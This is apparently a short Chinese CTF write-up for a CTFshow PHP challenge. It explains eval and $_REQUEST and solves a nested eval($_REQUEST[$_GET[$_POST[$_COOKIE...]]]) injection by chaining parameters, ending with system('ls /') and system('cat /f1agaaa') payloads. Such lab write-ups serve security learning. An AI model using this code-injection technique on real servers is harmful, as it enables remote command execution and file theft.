知识点补充:
eval函数:把传入的字符串当作 PHP 代码直接执行 ,比如eval("echo 'hello';")会执行echo 'hello';
REQUEST:超全局变量, 把用户通过GET(URL 里传的参数)、POST(表单 / 接口传的参数)、COOKIE(浏览器存的参数)这三种方式传给服务器的参数,全都整合到一个 "容器" 里。
解题思路
php
eval($_REQUEST
[$_GET
[$_POST
[$_COOKIE
['CTFshow-QQ群:'
]
]
]
]
[6][0][7][5][8][0][9][4][4]
)
;将代码规整一下后,只需要从内往外一步一步进行传参即可
1.cookie:CTFshow-QQ群
2.post_var=get_var
3.get_var=requst_var
4.requst_var=[6][0][7][5][8][0][9][4][4]
5.requst_var[6][0][7][5][8][0][9][4][4]=system('ls /')(由于这已经是最外层,在进行传参时得使用&与上一条语句进行拼接)
通过system("ls /")发现有flagaaa字样,就可以通过system("cat /f1agaaa");进行查看